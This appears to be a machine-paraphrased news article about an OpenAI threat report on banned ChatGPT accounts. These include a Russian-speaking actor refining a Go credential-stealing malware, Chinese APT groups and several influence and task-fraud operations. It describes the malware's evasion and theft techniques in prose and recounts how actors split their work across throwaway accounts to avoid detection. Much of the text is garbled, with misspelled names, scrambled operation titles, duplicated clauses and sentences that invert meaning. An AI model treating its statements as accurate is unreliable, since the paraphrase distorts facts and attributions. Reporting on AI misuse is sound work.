Openai has revealed that it has banned a set of ChatGPT accounts, which are likely run by Russian-speaking threat actors and two Chinese national hacking groups, to support investigations into malware development, social media automation, and US satellite communications technology.
“The (Russian-speaking) actor used our model to help develop and refine Windows malware, helping to debug code and set up command and control infrastructure in multiple languages,” Openai said in its Threat Intelligence Report. “The actor showed internal knowledge of Windows and demonstrated some operational security behaviour.”
The GO-based malware campaign is called Scopeep by artificial intelligence (AI) companies. There is no evidence that the activity is essentially widespread.
For each OpenAI, threat actors signed up for ChatGPT using temporary email accounts, and used each account they created to have one conversation, making a single incremental improvement to malicious software. They then abandoned their account and moved to the next account.
This practice of fine-tuning the code using a network of accounts emphasizes that it focuses on enemy operational security (OPSEC), Openai added.
The attackers then distributed AI-assisted malware through publicly available code repository that impersonated the legitimate video game Crosshair Overlay tool called Crosshair X.
“From there, malware is designed to initiate multi-stage processes to escalate privileges, establish stealth persistence, notify threat actors, and remove sensitive data while avoiding detection,” Openai said.
“The malware is designed to escalate privileges by restarting with ShellexeCuteW and attempts to avoid detection by programmatically removing it from Windows’ Defender using PowerShell, suppressing console windows and injecting timing delays.”
Other tactics built into Scopecreep include using base64 encoding to obfuscate payloads, DLL sideload technology, and the Sox5 proxy to hide the source IP address.
The ultimate goal of malware is to harvest the credentials, tokens and cookies stored in web browsers and remove them from the attacker. You can also alert a telegram channel run by threat actors when new victims compromise.
Openai asked the model to debug GO code snippets related to HTTPS requests, and asked to help use PowerShell commands using GO to change Windows Defender settings, particularly when it comes to adding antivirus exclusions.
The second group of ChatGPT accounts disabled by OpenAI is said to be related to two hacking groups attributed to China: ATP5 (aka Bronze Fleetwood, Keyhole Panda, Manganese, UNC2630) and APT15 (aka Free, Nylon Typhoon, Playful Taurus, Royal Panda, Vixenpanda)
On the other hand, one subset has modified the scripts and troubleshooted system configurations on issues related to open source research on various entities and technical topics of interest.
“Another subset of threat actors appeared to be engaging in developing support activities such as Linux systems management, software development, and infrastructure setup,” Openai said. “For these activities, threat actors used the models to perform research into configuration troubleshooting, software changes and implementation details.”
This consisted of asking for software packages for offline deployment and advice on configured firewalls and nameservers. Threat actors engaged in both web and Android app development activities.
Additionally, clusters related to China work on brute force scripts that can be split into FTP servers, automate penetration testing using large-scale language models (LLM) and manage fleets of Android devices, allowing them to use Facebook, Instag, Tiktok, X.
Some of the other observed malicious activity clusters utilize ChatGPT in a malicious way.
- The network, consistent with the North Korean IT Worker Scheme, has used Openai’s model to promote fraudulent employment campaigns by fostering deceptive employment campaigns by developing materials that could advance fraudulent attempts to apply IT, software engineering, and other remote jobs around the world.
- Cynical reviewon the topic of geopolitical relevance with countries for sharing on Facebook, Reddit, Tiktok, X, may generate Chinese and Urdu, which may have used a large amount of Openai models in English, Chinese, and Urdu.
- Operation High FivePhilippine origin activities using Openai’s model in English and taglish on topics related to Philippine politics and current events to share on Facebook and Tiktok
- Manipulate ambiguous focususing Openai’s model to generate social media posts for sharing in X by pose as journalists and geopolitical analysts, by questioning about computer network attacks and exploitation tools, China-origin activity, and translating emails and messages from Chinese to English as part of a suspected attempt at social engineering.
- Helgorand bite operationRussia and Origin activities that may have criticized the US and NATO to use Openai’s model to generate Russian content on German 2025 elections and share it with telegrams and X.
- Spam UncleChina-Origin Activities to generate polarized social media content that supports both sides of a divisive topic in US political discourse for sharing with Bluesky and X using Openai’s model.
- Storm-2035 used Openai’s model to generate short comments in English and Spanish, expressing support for Latino rights, Scottish independence, Ireland unity, and Palestinian rights, praised Iran’s military and diplomatic powers to praise Iran’s military and diplomatic powers, and to praise the ruthless accounts declaring residents of the US, Britain, Britain and Vanezura provinces.
- Manipulate the wrong numberOpenai’s model used to generate short recruitment style messages in English, Spanish, Swahili, Kinyarwanda, German, and Haitian Creoles, Cambodian and Origin activities related to Chinese-run task fraud.
“Some of these companies were operating by charging a substantial participation fee for new recruits and then using some of those funds to maintain engagement only enough to pay the existing ’employees’,” said Ben Nimmo, Albert Zhang, Sophia Farquhar, Max Murphy and Kimo Bumanglag of Openai. “This structure is a hallmark of task fraud.”